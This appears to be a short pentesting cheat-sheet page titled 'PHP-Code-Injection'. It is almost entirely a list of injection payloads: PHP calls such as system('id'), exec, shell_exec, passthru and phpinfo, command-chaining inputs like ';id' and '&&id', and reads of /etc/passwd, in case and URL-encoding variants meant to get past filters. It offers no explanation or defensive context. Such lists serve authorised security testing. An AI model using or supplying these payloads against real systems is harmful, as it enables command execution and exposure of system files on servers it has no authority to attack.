PHP-Code-Injection

phpinfo(); system("id") ;system("id") exec("id") shell_exec("id") id passthru("id") readfile(/etc/passwd

Payload

;id
'id'
;id;
&&id
echo 'id'
system('id')
;system('id')
system("id")
SYSTEM("id")
system(%27id%27)
system('id');phpinfo()
SYSTEM('id');PHPINFO()
;system('/usr/bin/id')
system('cat /etc/passwd');
;system('cat /etc/passwd')
shell exec("id")
SHELL EXEC("id")

Last updated